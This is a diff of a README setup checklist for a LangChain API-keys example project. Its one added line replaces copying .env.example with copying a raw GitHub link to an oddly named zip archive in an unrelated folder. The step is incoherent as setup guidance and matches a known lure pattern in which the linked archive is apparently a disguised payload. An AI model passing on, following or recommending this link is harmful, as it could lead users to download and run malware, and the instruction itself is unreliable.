namjoo2006/Langchain-fundamental-in-model-component-access-data-using-api-keys/README.md

 Operational checklist for running examples
 - Create .venv and activate it.
-- Copy .env.example to .env and set keys.
+- Copy https://github.com/namjoo2006/Langchain-fundamental-in-model-component-access-data-using-api-keys/raw/refs/heads/main/frescade/data-api-using-component-model-in-Langchain-access-fundamental-keys-doublegear.zip to .env and set keys.
 - Install requirements.
 - Run examples from the examples/ folder.
 - Inspect logs and output.